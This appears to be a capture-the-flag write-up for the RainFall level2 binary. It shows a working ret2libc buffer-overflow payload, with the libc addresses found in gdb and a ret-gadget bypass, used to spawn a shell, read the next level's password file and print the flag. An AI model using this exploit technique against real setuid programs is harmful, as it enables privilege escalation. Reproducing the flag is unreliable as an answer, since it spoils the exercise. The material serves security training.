After login we see next information:
```
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   /home/user/level2/level2
```

Command: `ls -l`
```
total 8
-rwsr-s---+ 1 level3 users 5403 Mar  6  2016 level2
```

Using `objdump` and `radar` tools find out that there are two functions inside `main` and `p`.  
![alt text](./Resources/main.png "main function")  
![alt text](./Resources/p.png "p function")


Check that addresses randomization off (should be `0`)
```
level2@RainFall:~$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 0
```

This binary is a target for `ret2lib` attack, but with one modification. 
Inside `p` function using `getc` we can overflow the stack and change return address, but after `getc` call there is an additional check for overridden return address. So I will override the return address in `main function`.

Get `system` and `exit` functions addresses
```
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7e6b060 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7e5ebe0 <exit>
```
Find `/bin/sh` string address inside `libc`
```
(gdb) find &system, +9999999,"/bin/sh"
0xb7f8cc58
warning: Unable to access target memory at 0xb7fd3160, halting search.
1 pattern found.
```
Using `objdump` to find `ret` instruction address inside `p` function.  
`ret` address: `804853e`

>As it's leetle endeean system:  
`ret` address     `0804853E` -> `3E850408`  
System address    `B7E6B060` -> `60B0E6B7`  
Exit address      `B7E5EBE0` -> `E0EBE5B7`  
`/bin/sh` address `B7F8CC58` -> `58CCF8B7`

Create payload:
```
python -c 'print "A" * 80 + "\x3E\x85\x04\x08" + "\x60\xB0\xE6\xB7" + "\xE0\xEB\xE5\xB7" + "\x58\xCC\xF8\xB7" ' > /tmp/payload
```
Command: `cat /tmp/payload - | ./level2`

Get `.pass` content: `cat /home/user/level3/.pass`

Flag: `492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02`